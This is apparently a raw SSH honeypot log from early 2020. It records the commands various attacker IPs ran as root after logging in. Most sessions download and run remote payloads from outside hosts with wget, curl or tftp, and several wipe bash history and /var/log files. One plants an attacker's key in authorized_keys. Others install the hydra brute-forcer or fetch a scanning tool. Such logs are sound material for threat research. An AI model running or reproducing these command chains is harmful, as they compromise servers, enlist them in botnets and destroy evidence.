From 5.11.37.63 3-Jan-2020 07:10:48 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk >>/dev/null;rm -rf zyk uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd /var/tmp cd /tmp wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk perl zyk >>/dev/null rm -rf zyk From 5.101.0.209 6-Jan-2020 18:41:09 ssh2 root Exec echo dssdfsdf|md5sum echo dssdfsdf|md5sum From 146.71.22.193 7-Jan-2020 01:46:02 ssh2 root Exec echo "cd /tmp; wget http://46.246.42.147/wget.sh || curl http://46.246.42.147/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.42.147/wget.sh || curl http://46.246.42.147/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 159.203.90.161 12-Jan-2020 19:06:14 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;perl zyk;rm -rf zyk uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd /var/tmp cd /tmp wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk perl zyk perl zyk rm -rf zyk From 199.200.21.254 16-Jan-2020 23:23:18 ssh2 root Exec curl -o /tmp/dl.sh http://129.121.176.89/autodl.sh & /bin/sh /tmp/dl.sh curl -o /tmp/dl.sh http://129.121.176.89/autodl.sh /bin/sh /tmp/dl.sh From 202.70.66.228 21-Jan-2020 17:06:10 ssh2 root Exec uname -a && lscpu uname -a lscpu Exec uname -a && lscpu uname -a lscpu From 202.70.66.228 21-Jan-2020 17:07:12 ssh2 root Exec uname -a && lscpu uname -a lscpu From 103.16.223.254 21-Jan-2020 23:31:05 ssh2 root Exec uname -a && lscpu uname -a lscpu Exec uname -a && lscpu uname -a lscpu From 80.211.45.156 22-Jan-2020 08:25:39 ssh2 root Exec uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime uname -a echo RAM: free -mt echo echo echo Procesoare: grep -c ^processor /proc/cpuinfo echo echo UPTIME: uptime From 159.203.90.161 22-Jan-2020 14:26:54 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd /var/tmp cd /tmp wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk perl zyk rm -rf zyk From 159.203.90.161 22-Jan-2020 14:43:06 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 killall -9 perl cd /var/tmp cd /tmp wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk perl zyk rm -rf zyk Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 killall -9 perl cd /var/tmp cd /tmp wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk perl zyk rm -rf zyk From 159.203.90.161 22-Jan-2020 14:45:23 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 killall -9 perl cd /var/tmp cd /tmp wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk perl zyk rm -rf zyk From 37.8.19.187 24-Jan-2020 02:03:04 ssh2 root ls ls Mail ls nsmail . From 82.165.197.136 24-Jan-2020 16:26:30 ssh2 root ls screen apt apt install screen screen screen bash screen cd /usr/bin s ls cd / ls python 0v for logs in `find /var/log -type f` do > $logs done cat /dev/null > ~/.bash_history history -c export HISTFILE=/dev/null unset HISTFILE unset HISTSIZE unset HISTTIME unset HISTFILESIZE echo > /var/log/btmp exit exit From 37.8.19.187 26-Jan-2020 01:27:18 ssh2 root free -m From 37.8.19.187 26-Jan-2020 02:36:02 ssh2 root مس ls test.pl ls test.pl From 95.138.142.48 28-Jan-2020 15:02:27 ssh2 root Exec echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`" echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`" From 85.184.243.37 29-Jan-2020 22:39:27 ssh2 root free -m ls From 37.8.16.184 2-Feb-2020 00:50:13 ssh2 root ls w free -g yum install hydra -y apt-get update wget http://61.91.57.222/iscan.jpg curl -O http://61.91.57.222/iscan.jpg cd .. ls passwd From 82.205.30.31 5-Feb-2020 00:17:14 ssh2 root passwd root password root From 82.205.30.31 5-Feb-2020 00:20:34 ssh2 root nano /etc/hosts ./nano /etc/hosts vi /etc/hosts ./vi /etc/hosts 127.0.0.1 localhost.localdomain localhost SERVER01 ./127.0.0.1 localhost.localdomain localhost SERVER01 sudo ifconfig | head -n 2 | tail -n 1 | tr -s " " | tr " " ":" | cut -d":" -f 4 sudo ifconfig | head -n 2 | tail -n 1 | tr -s " " | tr " " ":" | cut -d":" -f 4 From 82.205.30.31 5-Feb-2020 00:22:01 ssh2 root sudo ifconfig | head -n 2 | tail -n 1 | tr -s " " | tr " " ":" | cut -d":" -f 4 /sbin/ifconfig $(/sbin/route -n | awk '$1 == "0.0.0.0" {print $8}') | awk 'match($0, /inet addr:[.0-9]+/) {print substr($0, RSTART+10, RLENGTH-10)}' /sbin/ip addr show eth0 | awk -F"[ /]+" '/inet / {print $3}' From 82.205.30.31 5-Feb-2020 00:23:27 ssh2 root ipadm show-addr net0/v4 | awk -F"[ /]+" '/ok/ {print $5}' ./ipadm show-addr net0/v4 | awk -F"[ /]+" '/ok/ {print $5}' ipconfig getifaddr en0 ifconfig eth0 | awk -F"[ :]+" '/inet / {print $4}' getent hosts "$(hostname)" | awk '{ print $1 }' ip route get 1.2.3.4 74.125.139.102 via 192.168.0.1 dev wlan0 src 192.168.0.24 cache 74.125.139.102 via 192.168.0.1 dev wlan0 src 192.168.0.24 ip route get 1.2.3.4 | grep -oP '(?<=src )\S+' grep -oP '(?<=src )\S+' grep -oP '(?<=via )\S+')" From 82.205.30.31 5-Feb-2020 00:24:53 ssh2 root ip route get "$(ip route show to 0/0 | grep -oP '(?<=via )\S+')" ip route get "$(ip route show to 0/0 | grep -oP '(?<=via )\S+')" | grep -oP '(?<=src )\S+' $cfg['Servers'][$i]['password'] =" $cfg['Servers'][$i]['password'] = 'Type your root password here' umount /dev/sdb $ curl -I -s myapplication:5000 curl -I -s myapplication:5000 curl -I -s database:27017 $ curl -I -s database:27017 $ cat test.json | python -m json.tool cat test.json | python -m json.tool ./cat test.json | python -m json.tool ./myapp ./myapp: Permission denied -rw-r--r--. 1 root root 33 Jul 21 18:36 myapp tail -f /var/log/httpd/access_log From 82.205.30.31 5-Feb-2020 00:30:20 ssh2 root tail -f /var/log/httpd/access_log tail -n 100 /var/log/httpd/access_log $ tail -n 100 /var/log/httpd/access_log $ cat requirements.txt flask flask_pymongo $ cat tomcat.log | grep org.apache.catalina.startup.Catalina.start $ ps -ef du -sh /var/log/* /var/log/anaconda /sys/fs/selinux ./sys/fs/selinux fsck /dev/sdb # fsck /dev/sdb From 82.205.30.31 5-Feb-2020 00:32:47 ssh2 root sudo apt-get update sudo apt-get dist-upgrade From 193.105.134.45 5-Feb-2020 00:33:05 ssh2 root ifconfig eth0 down ifconfig eth0 up ifconfig eth0 192.168.1.12 ifconfig eth0 192.168.1.1 ifconfig eth0 netmask 255.255.255. ifconfig eth0 broadcast 192.168.1.255 ifconfig eth0 192.168.1.12 netmask 255.255.255.0 broadcast 192.168.1.255 netstat -an From 82.205.30.31 5-Feb-2020 00:34:37 ssh2 root netstat -c nslookup tecmint.com nslookup -query=mx tecmint.com dig tecmint.com +noall uptime wall "we will be going down for maintenance for one hour sharply at 03:30 pm" mesg [n|y] غ y write ravisaive talk ravisaive w From 82.205.30.31 5-Feb-2020 00:36:04 ssh2 root Give the file names a1, a2, a3, a4.....1213 rename a1 a0 a? top Mkfs.ext4 /dev/sda1 Mkfs.ext4 /dev/sda1 (sda1 block will be formatted) mkfs.ext4 /dev/sdb1 (sdb1 block will be formatted) touch a.txt (creates a text file a.txt) alias cp='rsync -aP' rsync -zvr IMG_5267\ copy\=33\ copy\=ok.jpg ~/Desktop/ free free -b From 82.205.30.31 5-Feb-2020 00:37:30 ssh2 root free -k free -m free -g free -h free -s 3 mysqldump -u root -p --all-databases > /home/server/Desktop/backupfile.sql mkpasswd -l 10 mkpasswd -l 20 yum install expect apt-get install expect From 82.205.30.31 5-Feb-2020 00:38:46 ssh2 root lsof cat test.txt more /etc/passwd cat /etc/passwd | more ps -ef | more less /etc/passwd cat /etc/passwd | less ps -ef | less passwd From 82.205.30.31 5-Feb-2020 00:40:12 ssh2 root passwd -S Only root can do that. sudo passwd -S khess sudo passwd khess sudo passwd -l john ifconfig grep 192.168.10. * grep -R 192.168.10. * ps -ef |grep systemd From 82.205.30.31 5-Feb-2020 00:41:38 ssh2 root ps -ef | grep systemd | grep -v grep grep -iR bob * ps -ef | grep systemd | grep -v grep | awk '{print $2}' cat test.txt | awk -F "," '{print $3}' $ curl -I -s myapplication:5000 curl -I -s myapplication:5000 curl -I -s database:27017 $ curl -I -s https://opensource.com cat test.json From 82.205.30.31 5-Feb-2020 00:43:05 ssh2 root $ cat test.json $ cat test.json | python -m json.tool cat test.json | python -m json.tool $ cat test.json | jq cat test.json | jq ./myapp $ ./myapp $ tail -n 100 /var/log/httpd/access_log ls pwd uname echo “hi” who history cd /dev/ ls dd if=/dev/cdrom1 of=/home/avi/Desktop/squeeze.iso From 82.205.30.31 5-Feb-2020 00:44:31 ssh2 root ping www.google.com su stat 34.odt ~$ stat 34.odt `34.odt' # echo "Tecmint [dot] com is the world's best website for qualitative Linux article" | pv -qL 20 echo "Tecmint [dot] com is the world's best website for qualitative Linux article" | pv -qL 20 ./echo "Tecmint [dot] com is the world's best website for qualitative Linux article" | pv -qL 20 ~$ mount | column -t /dev/sda1 /dev/sda1 on / From 82.205.30.31 5-Feb-2020 00:45:57 ssh2 root ./long-unix-script.sh screen ./long-unix-script.sh ./long-unix-script.sh ./long-unix-script.sh screen -r 4980.pts-0.localhost -r 4980.pts-0.localhost file 34.odt id uid=1000(avi) gid=1000(avi) groups=1000(avi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),117(scanner) From 82.205.30.31 5-Feb-2020 00:50:16 ssh2 root ls df -h df -h /home df -h | awk '{print $5 " " $6}' | sort -n | tail -5 du -h -s /var/log du -h -s /var/log 9,6M /var/log >/var/log/syslog /var/log/syslog for I in `ls "/var/log/*.log"` do >"$I" done ls -l /var/log | wc -l From 82.205.30.31 5-Feb-2020 00:51:42 ssh2 root du -k /var/log | sort -n | tail -5 ls -lSr du -ch /var/log/*.log | grep total find . -type f -size +100M -ls From 82.205.30.31 5-Feb-2020 00:53:20 ssh2 root Sudoers allows particular users to run various commands as guest1=/usr/local/bin/myprog ruser ALL=(ALL) ALL guest1=/usr/local/bin/myprog guest1=NOPASSWORD : /usr/local/bin/myprog Allow root to run any commands anywhere From 82.205.30.31 5-Feb-2020 00:54:55 ssh2 root root ALL=(ALL) ALL Allow kam user to execute iptables tcpdump commands Username Hostname= command1,command2 /sbin/iptables, /usr/sbin/tcpdump /usr/sbin/tcpdump ./usr/sbin/tcpdump [user] ALL=(ALL) [command_absolute_path] [file_list_seperated_via_comma] Oracle ALL=(ALL) /bin/ls /opt/oracle.ExaWatcher/archive From 82.205.30.31 5-Feb-2020 00:56:13 ssh2 root . .. . .. . .. . . . . . . . . . . . ........................ . . . . . .. From 118.69.35.149 5-Feb-2020 07:38:18 ssh2 root Exec echo "cd /tmp; wget http://46.246.37.212/wget.sh || curl http://46.246.37.212/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.37.212/wget.sh || curl http://46.246.37.212/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 148.66.133.228 5-Feb-2020 14:02:22 ssh2 root Exec cd /tmp;wget http://64.71.162.239/.sshd;curl -O http://64.71.162.239/.sshd;chmod +x .sshd;./.sshd;sleep 20;wget http://64.71.162.239/.zu;perl .zu;rm -rf .zu;history -rc cd /tmp wget http://64.71.162.239/.sshd curl -O http://64.71.162.239/.sshd chmod +x .sshd ./.sshd sleep 20 wget http://64.71.162.239/.zu perl .zu rm -rf .zu history -rc From 5.62.18.98 5-Feb-2020 22:16:20 ssh2 root yum install redhat-lsb /etc/centos-release /etc/os-release /etc/redhat-release /etc/system-release cat /etc/redhat-release cat /etc/centos-release cat /etc/os-release cat /etc/system-release rpm -ql centos-release | grep release$ rpm -qf /etc/redhat-release uname -s -r From 193.105.134.45 5-Feb-2020 22:17:45 ssh2 root uname -a uname -v rpm -q --verify kernel-3.10.0-693.21.1.el7.x86_64 hostnamectl yum install redhat-lsb lsb_release -d lsb_release -r lsb_release -a cat /boot/grub2/grub.cfg | grep -w menuentry grep saved_entry /boot/grub2/grubenv cat /boot/grub/grub.conf | grep title From 190.211.254.116 7-Feb-2020 04:07:22 ssh2 root Exec cat /etc/motd cat /etc/motd From 159.203.161.141 7-Feb-2020 20:25:09 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > sshserverruntime; chmod +x sshserverruntime; ./sshserverruntime ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.83/servicesd000/fx19.x86 cat fx19.x86 > sshserverruntime chmod +x sshserverruntime ./sshserverruntime ROOTED history -c From 45.148.10.93 7-Feb-2020 21:58:22 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > up-to-date01; chmod +x *; ./up-to-date01 ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.83/servicesd000/fx19.x86 cat fx19.x86 > up-to-date01 chmod +x * ./up-to-date01 ROOTED history -c From 139.59.56.121 8-Feb-2020 02:04:00 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys;cd uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd mkdir .ssh cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k mv .ssh/.auth_k .ssh/authorized_keys cd From 45.148.10.173 8-Feb-2020 08:37:43 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.92/cv0la/5531sx3.x86; cat 5531sx3.x86 > devel-date-new; chmod +x devel-date-new; ./devel-date-new ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.92/cv0la/5531sx3.x86 cat 5531sx3.x86 > devel-date-new chmod +x devel-date-new ./devel-date-new ROOTED history -c From 45.148.10.173 8-Feb-2020 14:30:08 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > devel-date-new; chmod +x devel-date-new; ./devel-date-new ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.83/servicesd000/fx19.x86 cat fx19.x86 > devel-date-new chmod +x devel-date-new ./devel-date-new ROOTED history -c From 159.203.117.137 9-Feb-2020 21:43:16 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > sshdsservers; chmod +x sshdsservers; ./sshdsservers ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.83/servicesd000/fx19.x86 cat fx19.x86 > sshdsservers chmod +x sshdsservers ./sshdsservers ROOTED history -c From 209.141.60.108 11-Feb-2020 08:23:34 ssh2 root Exec nproc;uname -a;curl -O http://arhive.altervista.org/n.pl ; perl n.pl ; rm -rf n.pl; history -nc nproc uname -a curl -O http://arhive.altervista.org/n.pl perl n.pl rm -rf n.pl history -nc From 46.246.45.171 11-Feb-2020 20:40:44 ssh2 root Exec cd /tmp; wget http://ardp.hldns.ru/wget.sh -O -> wget.sh; chmod +x wget.sh; ./wget.sh cd /tmp wget http://ardp.hldns.ru/wget.sh -O -> wget.sh chmod +x wget.sh ./wget.sh From 150.136.239.204 12-Feb-2020 06:56:06 ssh2 root Exec w ; nproc ; uname -a ; wget radiodeea.hi2.ro/asp.db ; chmod +x * ; perl asp.db ; curl -O radiodeea.hi2.ro/asp.db ; chmod +x * ; perl asp.db ; rm -rf asp.db ;rm -rf asp* ; history -c w nproc uname -a wget radiodeea.hi2.ro/asp.db chmod +x * perl asp.db curl -O radiodeea.hi2.ro/asp.db chmod +x * perl asp.db rm -rf asp.db rm -rf asp* history -c From 159.203.90.161 13-Feb-2020 19:59:11 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf kik.pl;wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl;perl kik.pl;rm -rf kik.pl uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd /var/tmp cd /tmp rm -rf kik.pl wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl perl kik.pl rm -rf kik.pl From 45.148.10.91 13-Feb-2020 22:03:30 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://104.248.150.167/servicesd000/fx19.x86; cat fx19.x86 > ssh-xuma19; chmod +x ssh-xuma19; ./ssh-xuma19 r00ted; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://104.248.150.167/servicesd000/fx19.x86 cat fx19.x86 > ssh-xuma19 chmod +x ssh-xuma19 ./ssh-xuma19 r00ted history -c From 203.138.172.104 14-Feb-2020 15:13:16 ssh2 root Exec echo "cd /tmp; wget http://46.246.45.171/wget.sh || curl http://46.246.45.171/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.45.171/wget.sh || curl http://46.246.45.171/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 149.129.58.243 14-Feb-2020 18:22:13 ssh2 root Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.45.171/bin.sh || curl http://46.246.45.171/curl.sh -o curl.sh || chmod +x *.sh; ./bin.sh; ./curl.sh' | sh echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / rm *.sh wget http://46.246.45.171/bin.sh || curl http://46.246.45.171/curl.sh -o curl.sh || chmod +x *.sh ./bin.sh ./curl.sh' | sh From 45.148.10.99 15-Feb-2020 17:43:12 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://104.248.150.167/servicesd000/fx19.x86; cat fx19.x86 > sshupdate; chmod +x *; ./sshupdate r00ted; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://104.248.150.167/servicesd000/fx19.x86 cat fx19.x86 > sshupdate chmod +x * ./sshupdate r00ted history -c From 45.148.10.143 16-Feb-2020 05:43:49 ssh2 root Exec cd /tmp; wget http://45.148.10.86/as12a0s/z2s234.x86; curl -O http://45.148.10.86/as12a0s/z2s234.x86;cat z2s234.x86 > ssh-updater; chmod +x *; ./ssh-updater rooted cd /tmp wget http://45.148.10.86/as12a0s/z2s234.x86 curl -O http://45.148.10.86/as12a0s/z2s234.x86 cat z2s234.x86 > ssh-updater chmod +x * ./ssh-updater rooted From 200.91.223.142 17-Feb-2020 03:43:34 ssh2 root Exec echo "cd /tmp; wget http://46.246.35.148/wget.sh || curl http://46.246.35.148/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.35.148/wget.sh || curl http://46.246.35.148/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 5.13.139.200 18-Feb-2020 15:24:46 ssh2 root ls wget nasapaul.com/ninfo ls nrpoc nproc passwd cat /os/release cat ./uptime From 191.234.160.243 18-Feb-2020 15:25:40 ssh2 root Exec uname -a ; lscpu uname -a lscpu cat /etc/passwd From 218.237.207.4 20-Feb-2020 02:07:34 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://89.42.133.67/axisbins.sh; chmod 777 axisbins.sh; sh axisbins.sh; tftp 89.42.133.67 -c get axistftp1.sh; chmod 777 axistftp1.sh; sh axistftp1.sh; tftp -r axistftp2.sh -g 89.42.133.67; chmod 777 axistftp2.sh; sh axistftp2.sh; rm -rf axisbins.sh axistftp1.sh axistftp2.sh; rm -rf * ; history -c cat /etc/issue cd /tmp || cd /run || cd / wget http://89.42.133.67/axisbins.sh chmod 777 axisbins.sh sh axisbins.sh tftp 89.42.133.67 -c get axistftp1.sh chmod 777 axistftp1.sh sh axistftp1.sh tftp -r axistftp2.sh -g 89.42.133.67 chmod 777 axistftp2.sh sh axistftp2.sh rm -rf axisbins.sh axistftp1.sh axistftp2.sh rm -rf * history -c From 106.110.233.186 21-Feb-2020 02:13:46 ssh2 root Exec echo "cd /tmp; wget http://46.246.45.213/wget.sh || curl http://46.246.45.213/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.45.213/wget.sh || curl http://46.246.45.213/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 128.199.175.116 21-Feb-2020 05:04:20 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.95/kuma-ssh-update.sh; curl -O http://45.148.10.95/kuma-ssh-update.sh; chmod 777 kuma-ssh-update.sh; sh kuma-ssh-update.sh; tftp 45.148.10.95 -c get kuma-ssh-update.sh; chmod 777 kuma-ssh-update.sh; sh kuma-ssh-update.sh; tftp -r kuma-ssh-update2.sh -g 45.148.10.95; chmod 777 kuma-ssh-update2.sh; sh kuma-ssh-update2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.95 kuma-ssh-update1.sh kuma-ssh-update1.sh; sh kuma-ssh-update1.sh; rm -rf kuma-ssh-update.sh kuma-ssh-update.sh kuma-ssh-update2.sh kuma-ssh-update1.sh; rm -rf *; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.95/kuma-ssh-update.sh curl -O http://45.148.10.95/kuma-ssh-update.sh chmod 777 kuma-ssh-update.sh sh kuma-ssh-update.sh tftp 45.148.10.95 -c get kuma-ssh-update.sh chmod 777 kuma-ssh-update.sh sh kuma-ssh-update.sh tftp -r kuma-ssh-update2.sh -g 45.148.10.95 chmod 777 kuma-ssh-update2.sh sh kuma-ssh-update2.sh ftpget -v -u anonymous -p anonymous -P 21 45.148.10.95 kuma-ssh-update1.sh kuma-ssh-update1.sh sh kuma-ssh-update1.sh rm -rf kuma-ssh-update.sh kuma-ssh-update.sh kuma-ssh-update2.sh kuma-ssh-update1.sh rm -rf * history -c From 64.227.37.126 21-Feb-2020 13:31:34 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://68.183.44.22/mixbins.sh; chmod 777 mixbins.sh; sh mixbins.sh; tftp 68.183.44.22 -c get mixtftp1.sh; chmod 777 mixtftp1.sh; sh mixtftp1.sh; tftp -r mixtftp2.sh -g 68.183.44.22; chmod 777 mixtftp2.sh; sh mixtftp2.sh; rm -rf mixbins.sh mixtftp1.sh mixtftp2.sh; 